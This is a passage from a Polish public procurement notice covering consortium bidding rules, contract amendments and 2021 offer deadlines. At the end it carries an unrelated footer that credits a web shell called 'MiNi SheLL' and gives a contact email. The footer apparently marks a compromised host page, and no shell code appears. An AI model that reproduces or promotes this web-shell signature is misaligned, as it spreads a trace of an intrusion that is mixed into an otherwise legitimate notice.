udzielenie zamówienia. W tym celu Wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego –<br/>nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej<br/>spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>2. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców składających wspólną ofertę.<br/>3. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika).<br/>4. Wykonawcy wspólnie ubiegający się o zamówienie, przedłożą wraz z ofertą:<br/>1) stosowne pełnomocnictwo – zgodnie z Rozdziałem XV SWZ – nie dotyczy spółki cywilnej, o<br/>ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. <br/>UWAGA: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką<br/>samą nazwą, albo z umowy podmiotów składających wspólnie ofertę<br/>2) oświadczenie, o którym mowa w art. 125 ustawy (Rozdział XV pkt 2 ppkt 1 SWZ) składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu,<br/>oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>a) Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>b) Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego<br/>warunku udziału w postępowaniu potwierdza jego spełnianie.<br/>3) oświadczenie, z którego wynika, które roboty, usługi lub dostawy wykonają poszczególni<br/>wykonawcy, w sytuacji określonej w art. 117 ust. 2 i 3 ustawy.<br/>5. Zasady rozliczania prac pomiędzy Wykonawcami wspólnie ubiegającymi się o udzielenie<br/>zamówienia, w tym zasady wystawiania faktur na rzecz Zamawiającego, należy określić<br/>w umowie regulującej współpracę tych Wykonawców, przy czym:<br/>1) Zamawiający zaleca, aby podmiotem uprawnionym do wystawiania faktur na rzecz<br/>Zamawiającego, przyjmowania płatności i dokonywania rozliczeń był Lider/Pełnomocnik<br/>Konsorcjum,* <br/>2) Zamawiający dopuszcza, aby faktury na rzecz Zamawiającego, były wystawiane przez<br/>poszczególnych członków Konsorcjum, pod warunkiem, że umowa Konsorcjum będzie zawierać<br/>odpowiednie zapisy w tym zakresie i wskazywać zakres prac wykonywanych przez<br/>poszczególnych członków Konsorcjum.<br/>6. W przypadku, gdy umowa regulująca współpracę Wykonawców wspólnie ubiegających się<br/>o zamówienia, nie będzie zawierała zasad rozliczania prac pomiędzy tymi Wykonawcami, w tym<br/>zasad wystawiania faktur na rzecz Zamawiającego, Zamawiający przyjmie, że jedynym<br/>Wykonawcą uprawnionym do wystawiania faktur będzie lider/pełnomocnik konsorcjum.<br/>* Wykonawca wskazany jako pełnomocnik lub jeden z Wykonawców (wskazany przez<br/>pozostałych) wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian umowy, których charakter oraz warunki<br/>wprowadzania są określone w projektowanych postanowieniach umowy w szczególności w § 12 projektowanych postanowień umowy stanowiących Załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-06 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem: https://platformazakupowa.pl/pn/kzgm_katowice na stronie dotyczącej odpowiedniego postępowania. 2.Oferta wraz z wymaganymi dokumentami muszą zostać podpisane kwalifikowanym podpisem elektronicznym, zaufanym lub osobistym.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-06 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com